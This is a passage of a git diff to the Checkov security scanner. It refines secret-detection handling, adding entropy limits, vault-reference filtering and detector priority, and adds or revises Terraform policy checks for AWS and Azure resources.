+                limit=entropy_limit), HexHighEntropyString(
+                limit=entropy_limit))
+        self.entropy_scanners_non_iac_with_keyword = (
+            Base64HighEntropyString(
+                limit=entropy_limit + 0.3),
+            HexHighEntropyString(
+                limit=entropy_limit + 0.3))
         self.high_entropy_scanners = (Base64HighEntropyString(limit=limit), HexHighEntropyString(limit=limit))
         self.keyword_scanner = KeywordDetector()
         self.max_line_length = max_line_length
diff --git a/checkov/secrets/plugins/load_detectors.py b/checkov/secrets/plugins/load_detectors.py
index 6915672979b..6391d61671f 100644
--- a/checkov/secrets/plugins/load_detectors.py
+++ b/checkov/secrets/plugins/load_detectors.py
@@ -32,7 +32,7 @@ def modify_secrets_policy_to_detectors(policies_list: List[dict[str, Any]]) -> L
     return secrets_list
 
 
-def add_to_custom_detectors(custom_detectors: List[Dict[str, Any]], name: str, check_id: str, regex: str,
+def add_to_custom_detectors(custom_detectors: List[Dict[str, Any]], name: str, check_id: str, regex: str, prerun: str,
                             is_custom: str, is_multiline: bool = False, supported_files: Optional[List[str]] = None) -> None:
     custom_detectors.append({
         'Name': name,
@@ -40,7 +40,8 @@ def add_to_custom_detectors(custom_detectors: List[Dict[str, Any]], name: str, c
         'Regex': regex,
         'isCustom': is_custom,
         'isMultiline': is_multiline,
-        'supportedFiles': supported_files if supported_files else []
+        'supportedFiles': supported_files if supported_files else [],
+        'prerun': prerun
     })
 
 
@@ -54,7 +55,7 @@ def add_detectors_from_condition_query(custom_detectors: List[Dict[str, Any]], c
             value = [value]
         for regex in value:
             parsed = True
-            add_to_custom_detectors(custom_detectors, secret_policy['title'], check_id, regex,
+            add_to_custom_detectors(custom_detectors, secret_policy['title'], check_id, regex, "",
                                     secret_policy['isCustom'])
     return parsed
 
@@ -77,6 +78,8 @@ def add_detectors_from_code(custom_detectors: List[Dict[str, Any]], code: str, s
                 secret_policy['title'],
                 check_id,
                 regex,
+                # Only one prerun per multiline regex
+                code_dict['definition'].get('prerun', [''])[0],
                 secret_policy['isCustom'],
                 code_dict['definition'].get("multiline", False),
                 code_dict['definition'].get("supported_files", [])
diff --git a/checkov/secrets/runner.py b/checkov/secrets/runner.py
index 1dc5dea5f28..b9bcd216383 100644
--- a/checkov/secrets/runner.py
+++ b/checkov/secrets/runner.py
@@ -1,7 +1,6 @@
 from __future__ import annotations
 
 import datetime
-import hashlib
 import linecache
 import logging
 import os
@@ -21,6 +20,7 @@
 from checkov.common.util.http_utils import request_wrapper, DEFAULT_TIMEOUT
 from detect_secrets import SecretsCollection
 from detect_secrets.core import scan
+from detect_secrets.core.potential_secret import PotentialSecret
 from detect_secrets.settings import transient_settings
 
 from checkov.common.bridgecrew.check_type import CheckType
@@ -47,7 +47,6 @@
 
 if TYPE_CHECKING:
     from checkov.common.util.tqdm_utils import ProgressBar
-    from detect_secrets.core.potential_secret import PotentialSecret
 
 SOURCE_CODE_EXTENSION = ['.py', '.js', '.properties', '.pem', '.php', '.xml', '.ts', '.env', '.java', '.rb',
                          'go', 'cs', '.txt']
@@ -73,7 +72,8 @@
     'Hex High Entropy String': 'CKV_SECRET_19'
 }
 
-ENTROPY_CHECK_IDS = ('CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80')
+ENTROPY_CHECK_IDS = {'CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80'}
+GENERIC_PRIVATE_KEY_CHECK_IDS = {'CKV_SECRET_10', 'CKV_SECRET_13', 'CKV_SECRET_192'}
 
 CHECK_ID_TO_SECRET_TYPE = {v: k for k, v in SECRET_TYPE_TO_ID.items()}
 
@@ -81,13 +81,22 @@
 MAX_FILE_SIZE = int(os.getenv('CHECKOV_MAX_FILE_SIZE', '5000000'))  # 5 MB is default limit
 
 
+def should_filter_vault_secret(secret_value: str, check_id: str) -> bool:
+    return 'vault:' in secret_value.lower() and check_id in ENTROPY_CHECK_IDS
+
+
 class Runner(BaseRunner[None, None, None]):
     check_type = CheckType.SECRETS  # noqa: CCE003  # a static attribute
 
-    def __init__(self, file_extensions: Iterable[str] | None = None, file_names: Iterable[str] | None = None):
+    def __init__(
+            self,
+            file_extensions: Iterable[str] | None = None,
+            file_names: Iterable[str] | None = None,
+            entropy_limit: Optional[float] = None):
         super().__init__(file_extensions, file_names)
         self.secrets_coordinator = SecretsCoordinator()
         self.history_secret_store = GitHistorySecretStore()
+        self.entropy_limit = entropy_limit or float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3'))
 
     def set_history_secret_store(self, value: Dict[str, List[EnrichedPotentialSecret]]) -> None:
         self.history_secret_store.secrets_by_file_value_type = value
@@ -121,7 +130,8 @@ def run(
             {'name': 'SquareOAuthDetector'},
             {'name': 'StripeDetector'},
             {'name': 'TwilioKeyDetector'},
-            {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py'}
+            {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py',
+             'entropy_limit': self.entropy_limit}
         ]
 
         # load runnable plugins
@@ -138,7 +148,8 @@ def run(
             policies_list = customer_run_config.get('secretsPolicies', [])
             suppressions = customer_run_config.get('suppressions', [])
             if suppressions:
-                secret_suppressions_id = [suppression['policyId'] for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy']
+                secret_suppressions_id = [suppression['policyId']
+                                          for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy']
             if policies_list:
                 runnable_plugins: dict[str, str] = get_runnable_plugins(policies_list)
                 logging.info(f"Found {len(runnable_plugins)} runnable plugins")
@@ -188,8 +199,10 @@ def run(
                         if enable_secret_scan_all_files:
                             # 'excluded_paths' shouldn't include the static paths from 'EXCLUDED_PATHS'
                             # they are separately referenced inside the 'filter_excluded_paths' function
-                            filter_excluded_paths(root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths)
-                            filter_excluded_paths(root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths)
+                            filter_excluded_paths(
+                                root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths)
+                            filter_excluded_paths(
+                                root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths)
                         else:
                             filter_ignored_paths(root, d_names, excluded_paths)
                             filter_ignored_paths(root, f_names, excluded_paths)
@@ -198,7 +211,7 @@ def run(
                                 if is_dockerfile(file):
                                     if 'dockerfile' not in block_list_secret_scan_lower:
                                         files_to_scan.append(os.path.join(root, file))
-                                elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower:
+                                elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower and file not in block_list_secret_scan_lower:
                                     files_to_scan.append(os.path.join(root, file))
                             elif file not in PROHIBITED_FILES and f".{file.split('.')[-1]}" in SUPPORTED_FILE_EXTENSIONS or is_dockerfile(
                                     file):
@@ -214,7 +227,17 @@ def run(
                 self.pbar.close()
 
             secret_records: dict[str, SecretsRecord] = {}
+            secrets_in_uuid_form = ['CKV_SECRET_116']
             for key, secret in secrets:
+                check_id = secret.check_id if secret.check_id else SECRET_TYPE_TO_ID.get(secret.type)
+                if not check_id:
+                    logging.debug(f'Secret was filtered - no check_id for line_number {secret.line_number}')
+                    continue
+                if secret.secret_value and should_filter_vault_secret(secret.secret_value, check_id):
+                    logging.debug(f'Secret was filtered - this is a vault reference: {secret.secret_value}')
+                    continue
+                secret_key = f'{key}_{secret.line_number}_{secret.secret_hash}'
+                # secret history
                 added_commit_hash, removed_commit_hash, code_line, added_by, removed_date, added_date = '', '', '', '', '', ''
                 if runner_filter.enable_git_history_secret_scan:
                     enriched_potential_secret = git_history_scanner.\
@@ -225,19 +248,18 @@ def run(
                     added_by = enriched_potential_secret.get('added_by') or ''
                     removed_date = enriched_potential_secret.get('removed_date') or ''
                     added_date = enriched_potential_secret.get('added_date') or ''
-                check_id = secret.check_id if secret.check_id else SECRET_TYPE_TO_ID.get(secret.type)
-                if not check_id:
-                    logging.debug(f'Secret was filtered - no check_id for line_number {secret.line_number}')
-                    continue
-                secret_key = f'{key}_{secret.line_number}_{secret.secret_hash}'
-                if secret.secret_value and is_potential_uuid(secret.secret_value):
+                # run over secret key
+                if isinstance(secret.secret_value, str) and secret.secret_value:
+                    stripped = secret.secret_value.strip(',";\'')
+                    if stripped != secret.secret_value:
+                        secret_key = f'{key}_{secret.line_number}_{PotentialSecret.hash_secret(stripped)}'
+                if secret.secret_value and is_potential_uuid(secret.secret_value) and secret.check_id not in secrets_in_uuid_form:
                     logging.info(
-                        f"Removing secret due to UUID filtering: {hashlib.sha256(secret.secret_value.encode('utf-8')).hexdigest()}")
+                        f"Removing secret due to UUID filtering: {PotentialSecret.hash_secret(secret.secret_value)}")
                     continue
                 if secret_key in secret_records.keys():
-                    if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS:
-                        secret_records.pop(secret_key)
-                    else:
+                    is_prioritise = self._prioritise_secrets(secret_records, secret_key, check_id)
+                    if not is_prioritise:
                         continue
                 bc_check_id = metadata_integration.get_bc_id(check_id)
                 if bc_check_id in secret_suppressions_id:
@@ -310,6 +332,17 @@ def run(
                 self._modify_invalid_secrets_check_result_to_skipped(report)
             return report
 
+    @staticmethod
+    def _prioritise_secrets(secret_records: Dict[str, SecretsRecord], secret_key: str, check_id: str) -> bool:
+        if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS:
+            secret_records.pop(secret_key)
+            return True
+        if secret_records[secret_key].check_id in GENERIC_PRIVATE_KEY_CHECK_IDS:
+            if check_id not in GENERIC_PRIVATE_KEY_CHECK_IDS | ENTROPY_CHECK_IDS:
+                secret_records.pop(secret_key)
+                return True
+        return False
+
     def cleanup_plugin_files(
             self,
             work_path: str,
@@ -423,7 +456,8 @@ def verify_secrets(self, report: Report, enriched_secrets_s3_path: str) -> Verif
 
         validate_secrets_tenant_config = None
         if bc_integration.customer_run_config_response is not None:
-            validate_secrets_tenant_config = bc_integration.customer_run_config_response.get('tenantConfig', {}).get('secretsValidate')
+            validate_secrets_tenant_config = bc_integration.customer_run_config_response.get(
+                'tenantConfig', {}).get('secretsValidate')
 
         if validate_secrets_tenant_config is None and not convert_str_to_bool(os.getenv("CKV_VALIDATE_SECRETS", False)):
             logging.debug('Secrets verification is off, enable it via code configuration screen')
diff --git a/checkov/secrets/scan_git_history.py b/checkov/secrets/scan_git_history.py
index 49ab4fb7f0e..b9256decbc0 100644
--- a/checkov/secrets/scan_git_history.py
+++ b/checkov/secrets/scan_git_history.py
@@ -20,7 +20,7 @@
 
 os.environ["GIT_PYTHON_REFRESH"] = "quiet"
 try:
-    from git import Repo, Tree  # type: ignore
+    from git import Repo, Tree
 
     git_import_error = None
 except ImportError as e:
diff --git a/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py b/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py
index b30119ef1d7..88a5c16805c 100644
--- a/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py
+++ b/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py
@@ -32,8 +32,8 @@ def scan_data_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
                                                                                                  list):
                             for identifier in principal_identifiers:
                                 if isinstance(identifier,
-                                              list) and 'oidc-provider/token.actions.githubusercontent.com' in \
-                                        identifier[0]:
+                                              list) and identifier[0] is not None and \
+                                        'oidc-provider/token.actions.githubusercontent.com' in identifier[0]:
                                     found_federated_gh_oidc = True
                                     break
                 if not found_federated_gh_oidc:
diff --git a/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml
new file mode 100644
index 00000000000..7060abf6142
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml
@@ -0,0 +1,25 @@
+metadata:
+  id: "CKV2_AWS_68"
+  name: "Ensure SageMaker notebook instance IAM policy is not overly permissive"
+  category: "NETWORKING"
+
+definition:
+  and:
+    - cond_type: filter
+      value:
+        - aws_sagemaker_notebook_instance
+      operator: within
+      attribute: resource_type
+    - cond_type: connection
+      resource_types:
+        - aws_sagemaker_notebook_instance
+      connected_resource_types:
+        - aws_iam_role
+      operator: exists
+    - cond_type: attribute
+      resource_types:
+        - aws_iam_role
+      attribute: "policy.Statement[?(@.Effect == Allow)].Action[*]"
+      operator: "jsonpath_not_equals"
+      value: "*"
+
diff --git a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml
index 325bfcb5974..edd6f0a6c6c 100644
--- a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml
+++ b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml
@@ -22,18 +22,6 @@ definition:
           attribute: "route.*.cidr_block"
           operator: "not_contains"
           value: "0.0.0.0/0"
-        - cond_type: "attribute"
-          resource_types:
-          - "aws_route_table"
-          attribute: "route.*.cidr_block"
-          operator: "not_contains"
-          value: "0.0.0.0"
-        - cond_type: "attribute"
-          resource_types:
-            - "aws_route_table"
-          attribute: "route.*.ipv6_cidr_block"
-          operator: "not_contains"
-          value: "::0"
         - cond_type: "attribute"
           resource_types:
             - "aws_route_table"
@@ -58,18 +46,6 @@ definition:
           attribute: "destination_cidr_block"
           operator: "not_contains"
           value: "0.0.0.0/0"
-        - cond_type: "attribute"
-          resource_types:
-          - "aws_route"
-          attribute: "destination_cidr_block"
-          operator: "not_contains"
-          value: "0.0.0.0"
-        - cond_type: "attribute"
-          resource_types:
-            - "aws_route"
-          attribute: "destination_ipv6_cidr_block"
-          operator: "not_contains"
-          value: "::0"
         - cond_type: "attribute"
           resource_types:
             - "aws_route"
diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml
new file mode 100644
index 00000000000..316387f331e
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml
@@ -0,0 +1,36 @@
+metadata: 
+  id: "CKV2_AZURE_50"
+  name: "Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible"
+  category: "NETWORKING"
+
+definition:
+  or:
+  - cond_type: filter
+    attribute: resource_type
+    operator: within
+    value:
+      - azurerm_machine_learning_workspace
+  - cond_type: attribute
+    resource_types: azurerm_machine_learning_workspace
+    attribute: high_business_impact
+    operator: equals
+    value: false
+  - and:
+    - cond_type: filter
+      attribute: resource_type
+      operator: within
+      value:
+        - azurerm_machine_learning_workspace
+    - cond_type: connection
+      resource_types:
+        - azurerm_machine_learning_workspace
+      connected_resource_types:
+        - azurerm_storage_account
+      operator: exists
+    - cond_type: attribute
+      resource_types: azurerm_storage_account
+      attribute: public_network_access_enabled
+      operator: equals
+      value: false
+    
+
diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml
new file mode 100644
index 00000000000..4257b465792
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml
@@ -0,0 +1,16 @@
+metadata:
+  id: "CKV2_AZURE_49"
+  name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access"
+  category: "NETWORKING"
+definition:
+  or:
+  - cond_type: "attribute"
+    resource_types: "azurerm_machine_learning_workspace"
+    attribute: "public_network_access_enabled"
+    operator: "not_exists"
+  - cond_type: "attribute"
+    resource_types: "azurerm_machine_learning_workspace"
+    attribute: "public_network_access_enabled"
+    operator: "equals"
+    value: "false"
+
diff --git a/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml
new file mode 100644
index 00000000000..48c03706f76
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml
@@ -0,0 +1,45 @@
+metadata:
+  id: "CKV2_AZURE_48"
+  name: "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption"
+  category: "ENCRYPTION"
+definition:
+  or:
+    - and:
+      - cond_type: filter
+        attribute: resource_type
+        operator: within
+        value:
+          - azurerm_databricks_workspace
+      - resource_types:
+          - azurerm_databricks_workspace
+        operator: not_equals
+        cond_type: attribute
+        attribute: sku
+        value: "premium"
+    - and:
+        - cond_type: filter
+          attribute: resource_type
+          operator: within
+          value:
+            - azurerm_databricks_workspace
+        - resource_types:
+            - azurerm_databricks_workspace
+          operator: equals
+          cond_type: attribute
+          attribute: sku
+          value: "premium"
+        - resource_types:
+            - azurerm_databricks_workspace
+          operator: equals
+          cond_type: attribute
+          attribute: customer_managed_key_enabled
+          value: true
+        - resource_types:
+            - azurerm_databricks_workspace
+          connected_resource_types:
+            - azurerm_databricks_workspace_root_dbfs_customer_managed_key
+          operator: exists
+          cond_type: connection
+
+# Root DBFS encryption is only valid if the Databricks Workspace sku is set to 'premium'.
+# https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/databricks_workspace#customer_managed_key_enabled
\ No newline at end of file
diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml
new file mode 100644
index 00000000000..744c96cdd83
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml
@@ -0,0 +1,39 @@
+metadata: 
+  id: "CKV2_AZURE_54"
+  name: "Ensure log monitoring is enabled for Synapse SQL Pool"
+  category: "LOGGING"
+
+definition:
+  and:
+    - cond_type: connection
+      resource_types:
+        - azurerm_synapse_sql_pool
+      connected_resource_types:
+        - azurerm_synapse_sql_pool_extended_auditing_policy
+      operator: exists
+    - cond_type: filter
+      attribute: resource_type
+      value:
+        - azurerm_synapse_sql_pool
+      operator: within
+
+    - or:
+      - and:
+        - cond_type: attribute
+          resource_types:
+            - azurerm_synapse_sql_pool_extended_auditing_policy
+          attribute: log_monitoring_enabled
+          operator: exists
+
+        - cond_type: attribute
+          resource_types:
+            - azurerm_synapse_sql_pool_extended_auditing_policy
+          attribute: log_monitoring_enabled
+          operator: equals
+          value: true
+
+      - cond_type: attribute
+        resource_types:
+          - azurerm_synapse_sql_pool_extended_auditing_policy
+        attribute: log_monitoring_enabled
+        operator: not_exists
\ No newline at end of file
diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml
new file mode 100644
index 00000000000..19e2a749db7
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml
@@ -0,0 +1,24 @@
+metadata: 
+  id: "CKV2_AZURE_51"
+  name: "Ensure Synapse SQL Pool has a security alert policy"
+  category: "GENERAL_SECURITY"
+
+definition:
+  and:
+    - cond_type: connection
+      resource_types:
+        - azurerm_synapse_sql_pool
+      connected_resource_types:
+        - azurerm_synapse_sql_pool_security_alert_policy
+      operator: exists
+    - cond_type: attribute
+      resource_types:
+        - azurerm_synapse_sql_pool_security_alert_policy
+      attribute: 'policy_state'
+      operator: equals
+      value: 'Enabled'
+    - cond_type: filter
+      attribute: resource_type
+      value:
+        - azurerm_synapse_sql_pool
+      operator: within
\ No newline at end of file
diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml
new file mode 100644
index 00000000000..5d1c2c849b7
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml
@@ -0,0 +1,32 @@
+metadata: 
+  id: "CKV2_AZURE_52"
+  name: "Ensure Synapse SQL Pool has vulnerability assessment attached"
+  category: "GENERAL_SECURITY"
+
+definition:
+  and:
+    - resource_types:
+        - azurerm_synapse_sql_pool
+      connected_resource_types:
+        - azurerm_synapse_sql_pool_security_alert_policy
+      operator: exists
+      cond_type: connection
+    - resource_types:
+        - azurerm_synapse_sql_pool_security_alert_policy
+      connected_resource_types:
+        - azurerm_synapse_sql_pool_vulnerability_assessment
+      operator: exists
+      cond_type: connection
+    - cond_type: attribute
+      resource_types:
+        - azurerm_synapse_sql_pool_vulnerability_assessment
+      attribute: 'recurring_scans.*.enabled'
+      operator: equals
+      value: true
+    - cond_type: filter
+      attribute: resource_type
+      value:
+        - azurerm_synapse_sql_pool_security_alert_policy
+      operator: within
+
+    
\ No newline at end of file
diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml
new file mode 100644
index 00000000000..038284a5951
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml
@@ -0,0 +1,18 @@
+metadata: 
+  id: "CKV2_AZURE_53"
+  name: "Ensure Azure Synapse Workspace has extended audit logs"
+  category: "LOGGING"
+
+definition:
+  and:
+    - cond_type: filter
+      attribute: resource_type
+      value:
+        - azurerm_synapse_workspace
+      operator: within
+    - cond_type: connection
+      resource_types:
+        - azurerm_synapse_workspace
+      connected_resource_types:
+        - azurerm_synapse_workspace_extended_auditing_policy
+      operator: exists
\ No newline at end of file
diff --git a/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml b/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml
deleted file mode 100644
index 1bce7d5095b..00000000000
--- a/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-metadata:
-  id: "CKV2_IBM_6"
-  name: "Ensure Databases network access is restricted to a specific IP range"
-  category: "NETWORKING"
-
-definition:
-  and:
-    - cond_type: "attribute"
-      resource_types: "ibm_database"
-      attribute: "allowlist"
-      operator: "exists"
-
-    - cond_type: "attribute"
-      resource_types: "ibm_database"
-      attribute: "allowlist.address"
-      operator: "not_equals_ignore_case"
-      value: "0.0.0.0/0"
-
-    - cond_type: "attribute"
-      resource_types: "ibm_database"
-      attribute: "allowlist.address"
-      operator: "length_greater_than"
-      value: "0"
diff --git a/checkov/terraform/checks/module/base_module_check.py b/checkov/terraform/checks/module/base_module_check.py
index 62f0d0eceb4..df2189d8e5e 100644
--- a/checkov/terraform/checks/module/base_module_check.py
+++ b/checkov/terraform/checks/module/base_module_check.py
@@ -45,3 +45,7 @@ def scan_entity_conf(self, conf: Dict[str, List[Any]], entity_type: str) -> Chec
     @abstractmethod
     def scan_module_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
         raise NotImplementedError()
+
+    @staticmethod
+    def is_git_source(source: str) -> bool:
+        return source.startswith('git@') or source.startswith('git::') or source.startswith('github.com') or source.startswith('bitbucket.org')
diff --git a/checkov/terraform/checks/module/generic/RevisionVersionTag.py b/checkov/terraform/checks/module/generic/RevisionVersionTag.py
new file mode 100644
index 00000000000..34a7b85072d
--- /dev/null
+++ b/checkov/terraform/checks/module/generic/RevisionVersionTag.py
@@ -0,0 +1,41 @@
+from __future__ import annotations
+
+import re
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.terraform.checks.module.base_module_check import BaseModuleCheck
+from .RevisionHash import check as RevisionHashCheck
+
+VERSION_PATTERN = re.compile(r"[?&](ref=).*(\d\.\d).*")
+
+
+class RevisionVersionTag(BaseModuleCheck):
+    def __init__(self) -> None:
+        name = "Ensure Terraform module sources use a tag with a version number"
+        id = "CKV_TF_2"
+        categories = [CheckCategories.SUPPLY_CHAIN]
+        super().__init__(name=name, id=id, categories=categories)
+
+    def scan_module_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
+        # this check is a more lenient version of the hash check, so if that one passes (or is unknown due to a local module),
+        # then we are done
+        hash_result = RevisionHashCheck.scan_module_conf(conf)
+        if hash_result != CheckResult.FAILED:
+            return hash_result
+
+        source = conf.get("source")
+        if source and isinstance(source, list):
+            source_url = source[0]
+            if BaseModuleCheck.is_git_source(source_url):
+                if ("?ref" in source_url or "&ref" in source_url) and re.search(VERSION_PATTERN, source_url):
+                    return CheckResult.PASSED
+            else:
+                version = conf.get("version")
+                if source and isinstance(version, list):
+                    return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = RevisionVersionTag()
diff --git a/checkov/terraform/checks/resource/__init__.py b/checkov/terraform/checks/resource/__init__.py
index e28fd64ce5f..9228a58ee71 100644
--- a/checkov/terraform/checks/resource/__init__.py
+++ b/checkov/terraform/checks/resource/__init__.py
@@ -12,3 +12,4 @@
 from checkov.terraform.checks.resource.kubernetes import *  # noqa
 from checkov.terraform.checks.resource.yandexcloud import *  # noqa
 from checkov.terraform.checks.resource.ncp import *  # noqa
+from checkov.terraform.checks.resource.tencentcloud import * # noqa
diff --git a/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py b/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py
index e8f4737c626..fb09830902c 100644
--- a/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py
+++ b/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py
@@ -1,5 +1,9 @@
+from __future__ import annotations
+
+from typing import Any
+
 from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
-from checkov.common.models.enums import CheckCategories
+from checkov.common.models.enums import CheckCategories, CheckResult
 
 
 class APIGatewayMethodSettingCacheEncrypted(BaseResourceValueCheck):
@@ -18,5 +22,20 @@ def __init__(self):
     def get_inspected_key(self):
         return "settings/[0]/cache_data_encrypted"
 
+    def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
+        settings = conf.get("settings", {})
+        if settings and len(settings) == 1:
+            settings = settings[0]
+        cache_enabled = settings.get("caching_enabled", [False])
+        if isinstance(cache_enabled, list) and len(cache_enabled) == 1:
+            cache_enabled = cache_enabled[0]
+        if cache_enabled:
+            cache_encrypted = settings.get("cache_data_encrypted", [False])
+            if isinstance(cache_encrypted, list) and len(cache_encrypted) == 1:
+                cache_encrypted = cache_encrypted[0]
+            if not cache_encrypted:
+                return CheckResult.FAILED
+        return CheckResult.PASSED
+
 
 check = APIGatewayMethodSettingCacheEncrypted()
diff --git a/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py b/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py
new file mode 100644
index 00000000000..24473792804
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py
@@ -0,0 +1,23 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+
+
+class BedrockAgentEncrypted(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Bedrock Agent is encrypted with a CMK"
+        id = "CKV_AWS_373"
+        supported_resources = ("aws_bedrockagent_agent",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "customer_encryption_key_arn"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = BedrockAgentEncrypted()
diff --git a/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..24fe3b80b9b
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CloudsearchDomainEnforceHttps(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access"
+        id = "CKV_AWS_366"
+        supported_resources = ["aws_cognito_identity_pool"]
+        categories = [CheckCategories.IAM]
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+        )
+
+    def get_inspected_key(self) -> str:
+        return "allow_unauthenticated_identities"
+
+    def get_expected_value(self) -> bool:
+        return False
+
+
+check = CloudsearchDomainEnforceHttps()
diff --git a/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py b/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py
index ad31c14c279..d3923989afc 100644
--- a/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py
+++ b/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py
@@ -1,11 +1,11 @@
-
+from typing import List, Any
 
 from checkov.common.models.enums import CheckCategories
 from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
 
 
 class DeprecatedLambdaRuntime(BaseResourceNegativeValueCheck):
-    def __init__(self):
